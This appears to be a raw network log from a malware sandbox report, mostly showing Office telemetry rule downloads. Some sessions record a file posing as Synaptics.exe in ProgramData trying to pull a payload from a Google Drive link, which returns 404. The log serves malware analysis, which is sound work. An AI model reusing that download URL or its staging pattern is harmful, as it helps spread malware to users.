                                                                                        12192.168.2.54975113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:21 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 450
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                        x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdhk6hphC1EWRaw3c00000002yg00000000vmcz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        13192.168.2.54974913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:21 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3788
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                        x-ms-request-id: 667c147a-501e-0016-34cc-45181b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdlqd7fhC1EWR6vt000000003c000000000tc5c
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        14192.168.2.54975213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:21 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2160
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                        x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdwt8wrhC1EWRu6rg00000003cg00000000qpst
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        15192.168.2.54975313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:21 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                        x-ms-request-id: 9ac3d201-201e-0000-03c5-45a537000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdfg4slhC1EWR34t0000000038000000000299z
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.549756172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:23 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:22 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ngxVxqjkDhgeWSpBCwCnkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.549758142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:23 UTC1253INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:23 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xpgmVQObIPSZ4RoQpbE11g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6OhGIlKkIe1QmVLK3cgHqgev68wC3dNRbW04LCORfKr5OEEq7ilqeXq6gVPivn3X9ua88Y3Lduxg
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:23 UTC137INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:23 UTC1390INData Raw: 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 78 59 35 53 59 6f 38 30 4e 66 2d 43 2d 73 6c 68 55 4b 6d 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="yxY5SYo80Nf-C-slhUKmdg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:23 UTC125INData Raw: 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.549759142.250.181.1294432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:23 UTC1253INHTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:23 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fCOtNfxMBp12cRLlDfEk1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6Kf_LB2s2Ylt2SAi7tcnX7nQv_TUI35TL_j1Xo_ZighmQZ9wiSC8iw42zJl38_reYlbE5CNtUIGg
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:23 UTC137INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:23 UTC1390INData Raw: 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 70 76 53 33 68 34 59 65 6d 32 61 4a 52 79 64 77 4e 2d 34 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="OpvS3h4Yem2aJRydwN-4dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:23 UTC125INData Raw: 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.549757172.217.19.2384432180C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:23 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:22 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xNcT7nNulYf-63WAdZLz5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        20192.168.2.54976113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-05 21:50:23 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                        x-ms-request-id: d3611829-901e-007b-22c2-45ac50000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdwt8wrhC1EWRu6rg00000003e000000000ezwc
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
